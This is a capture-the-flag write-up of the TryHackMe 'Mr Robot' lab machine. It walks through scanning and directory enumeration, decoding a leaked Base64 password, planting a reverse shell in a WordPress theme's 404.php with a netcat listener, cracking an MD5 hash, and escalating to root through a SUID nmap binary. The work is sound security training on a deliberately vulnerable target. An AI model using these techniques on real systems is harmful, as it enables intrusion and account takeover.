Trayhackme Mr Robot CTF Writeup
Let’s start with nmap scanning first
Command: nmap -vv -sCV 10.10.27.35
PORT STATE SERVICE REASON VERSION
22/tcp closed ssh conn-refused
80/tcp open http syn-ack Apache httpd
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http syn-ack Apache httpd
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=www.example.com
| Issuer: commonName=www.example.com
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2015-09-16T10:45:03
| Not valid after: 2025-09-13T10:45:03
| MD5: 3c16 3b19 87c3 42ad 6634 c1c9 d0aa fb97
| SHA-1: ef0c 5fa5 931a 09a5 687c a2c2 80c4 c792 07ce f71b
| -----BEGIN CERTIFICATE-----
| MIIBqzCCARQCCQCgSfELirADCzANBgkqhkiG9w0BAQUFADAaMRgwFgYDVQQDDA93
| d3cuZXhhbXBsZS5jb20wHhcNMTUwOTE2MTA0NTAzWhcNMjUwOTEzMTA0NTAzWjAa
| MRgwFgYDVQQDDA93d3cuZXhhbXBsZS5jb20wgZ8wDQYJKoZIhvcNAQEBBQADgY0A
| MIGJAoGBANlxG/38e8Dy/mxwZzBboYF64tu1n8c2zsWOw8FFU0azQFxv7RPKcGwt
| sALkdAMkNcWS7J930xGamdCZPdoRY4hhfesLIshZxpyk6NoYBkmtx+GfwrrLh6mU
| yvsyno29GAlqYWfffzXRoibdDtGTn9NeMqXobVTTKTaR0BGspOS5AgMBAAEwDQYJ
| KoZIhvcNAQEFBQADgYEASfG0dH3x4/XaN6IWwaKo8XeRStjYTy/uBJEBUERlP17X
| 1TooZOYbvgFAqK8DPOl7EkzASVeu0mS5orfptWjOZ/UWVZujSNj7uu7QR4vbNERx
| ncZrydr7FklpkIN5Bj8SYc94JI9GsrHip4mpbystXkxncoOVESjRBES/iatbkl0=
|_-----END CERTIFICATE-----Tryhackme gave us “robots” on the tip. Let’s take a look at the robots.txt file on the http port.
And we get the first key
Let’s run a directory scan to see if there are hidden files on the http port.
Command: gobuster dir -u http://10.10.27.35 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.27.35
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt
[+] Timeout: 10s
===============================================================
2021/02/27 07:54:22 Starting gobuster
===============================================================
/sitemap (Status: 200)
/video (Status: 301)
/images (Status: 301)
/0 (Status: 301)
/feed (Status: 301)
/blog (Status: 301)
/image (Status: 301)
/rss (Status: 301)
/login (Status: 302)
/atom (Status: 301)
/wp-content (Status: 301)
/admin (Status: 301)
/audio (Status: 301)
/intro (Status: 200)
/license (Status: 200)
/license.txt (Status: 200)
===============================================================
2021/02/27 07:56:43 Finished
===============================================================Let’s take a look at the license.txt file
what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?do you want a password or something?ZWxs***************1Mgo=
We find a text encrypted with Base64. Let’s decode it
Command: echo 'Zwxs****************1Mgo=' |base64 -d
Bingo .. We got the password of the Elliot user. Let’s login from the Wordpress login page.
Go to Appearance-Editor section and select 404.php section. And paste our reverse shell commands here.
Now, let’s start listening with netcat and activate the reverse shell.
Command: nc -lvp 4444
http://10.10.27.35/wp-content/themes/twentyfifteen/404.php
listening on [any] 4444 ...
10.10.27.35: inverse host lookup failed: Unknown host
connect to [10.9.45.10] from (UNKNOWN) [10.10.27.35] 56155
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
13:14:28 up 37 min, 0 users, load average: 0.00, 0.34, 1.04
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$We spawn pty with Python and export xterm.
Command: python -c 'import pty;pty.spawn(''/bin/bash'')' && export TERM=xterm
daemon@linux:/$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
daemon@linux:/$When we look at the files of a user named robot to increase the authority, we find a file named “password.raw-md5”.
robot:c3fcd3d76**************cca67e13bIt looks like an MD5 password. We can find the correct password using https://md5.gromweb.com/
abcdefg************tuvwxyzWe can now switch to the robot user and we can read the second key
Command: su robot
robot@linux:~$ cat key-2-of-3.txt
822c7395************e3eb39f959Now we need to be root to get the last key. Let’s start with a SUID scan.
Command: find / -perm -4000 -type f 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chownYeah I think we found it. /usr/local/bin/nmap we can use this
nmap --interactive
nmap> !sh
Now we can go to the root directory and read our last key
# cd /root
# ls
firstboot_done key-3-of-3.txt
# cat key*
04787ddef2***************21670b4e4
#Thank you for reading and solving